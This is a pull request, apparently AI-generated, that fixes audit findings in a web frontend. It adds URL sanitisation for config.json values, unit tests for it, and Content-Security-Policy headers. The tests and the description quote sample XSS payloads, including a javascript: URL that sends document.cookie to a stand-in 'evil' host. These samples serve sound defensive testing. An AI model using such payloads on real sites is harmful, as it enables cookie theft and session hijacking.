### PR TITLE
web: reject non-http(s) config URLs and add security headers

### DIFF
--- a/misc/nginx-default.conf
+++ b/misc/nginx-default.conf
@@ -9,6 +9,14 @@ server {
 
 	server_name localhost;
 
+	# Security headers. The SPA is fully self-contained (no external scripts,
+	# styles, fonts or images), so a strict policy holds. Note: if you serve the
+	# API from a different origin (config.json apiUrl), add it to connect-src.
+	add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'" always;
+	add_header X-Content-Type-Options "nosniff" always;
+	add_header X-Frame-Options "DENY" always;
+	add_header Referrer-Policy "no-referrer" always;
+
 	location /api {
 		proxy_pass http://api;
 	}

--- a/web/src/lib/config.test.ts
+++ b/web/src/lib/config.test.ts
@@ -1,0 +1,28 @@
+import { describe, it, expect } from 'vitest';
+import { sanitizeUrl } from './config';
+
+describe('sanitizeUrl', () => {
+  const fallback = 'https://safe.example';
+
+  it('accepts http and https URLs', () => {
+    expect(sanitizeUrl('https://expedition.dev', fallback)).toBe('https://expedition.dev');
+    expect(sanitizeUrl('http://etc.mypool.io', fallback)).toBe('http://etc.mypool.io');
+  });
+
+  it('accepts same-origin relative URLs', () => {
+    expect(sanitizeUrl('/', fallback)).toBe('/');
+    expect(sanitizeUrl('/api/', fallback)).toBe('/api/');
+  });
+
+  it('rejects javascript: and data: URLs', () => {
+    expect(sanitizeUrl("javascript:fetch('//evil/'+document.cookie)", fallback)).toBe(fallback);
+    expect(sanitizeUrl('data:text/html,<script>alert(1)</script>', fallback)).toBe(fallback);
+    expect(sanitizeUrl('JavaScript:alert(1)', fallback)).toBe(fallback);
+  });
+
+  it('rejects non-string and empty values', () => {
+    expect(sanitizeUrl(undefined, fallback)).toBe(fallback);
+    expect(sanitizeUrl(42, fallback)).toBe(fallback);
+    expect(sanitizeUrl('', fallback)).toBe(fallback);
+  });
+});

--- a/web/src/lib/config.ts
+++ b/web/src/lib/config.ts
@@ -30,12 +30,36 @@ export const defaults: AppConfig = {
 
 export const config = writable<AppConfig>(defaults);
 
+// sanitizeUrl only accepts http(s) or same-origin-relative URLs. config.json is a
+// separate file (often on a looser-ACL host than the JS bundle), and its apiUrl /
+// explorerUrl flow into fetch targets and <a href>. Without this, a tampered
+// config could inject a `javascript:` URL that runs script in the pool's origin
+// when a block/tx link is clicked.
+export function sanitizeUrl(value: unknown, fallback: string): string {
+  if (typeof value !== 'string' || value === '') return fallback;
+  // A base is only needed to resolve relative values like "/"; the scheme check
+  // is what matters. Falls back to a dummy base when there is no window (tests).
+  const base = typeof window !== 'undefined' ? window.location.origin : 'http://localhost';
+  try {
+    const u = new URL(value, base);
+    if (u.protocol === 'http:' || u.protocol === 'https:') return value;
+  } catch {
+    // not a parseable URL
+  }
+  return fallback;
+}
+
 export async function loadConfig(): Promise<void> {
   try {
     const res = await fetch(import.meta.env.BASE_URL + 'config.json', { cache: 'no-cache' });
     if (res.ok) {
       const loaded = (await res.json()) as Partial<AppConfig>;
-      config.set({ ...defaults, ...loaded });
+      config.set({
+        ...defaults,
+        ...loaded,
+        apiUrl: sanitizeUrl(loaded.apiUrl, defaults.apiUrl),
+        explorerUrl: sanitizeUrl(loaded.explorerUrl, defaults.explorerUrl),
+      });
     }
   } catch {
     // keep defaults if config.json is missing or unparseable


### PR DESCRIPTION
Fixes **M3** and **L-CSP** from the audit.

**M3 — `javascript:` URL via config.json.** `loadConfig` spread `config.json`'s `apiUrl`/`explorerUrl` unchecked into `fetch` targets and `<a href>`. Since `config.json` is a separate file (its whole purpose is edit-without-rebuild, often on a looser-ACL host than the JS bundle), a tampered `explorerUrl` like `javascript:fetch('//evil/'+document.cookie)` would execute in the pool's origin when any block/tx/address link is clicked. `sanitizeUrl` now accepts only `http(s)` or same-origin-relative URLs and falls back to the defaults. Unit-tested (accepts http/https/relative; rejects `javascript:`/`data:`/non-string).

**L-CSP — no Content-Security-Policy.** Added a CSP plus `X-Frame-Options`, `X-Content-Type-Options` and `Referrer-Policy` to `misc/nginx-default.conf`. The SPA is fully self-contained (no external scripts/styles/fonts/images), so `default-src 'self'` holds and neutralizes the whole `javascript:`-URI class as defense in depth. (A cross-origin `apiUrl` needs that origin added to `connect-src` — noted in the config.)

🤖 Generated with [Claude Code](https://claude.com/claude-code)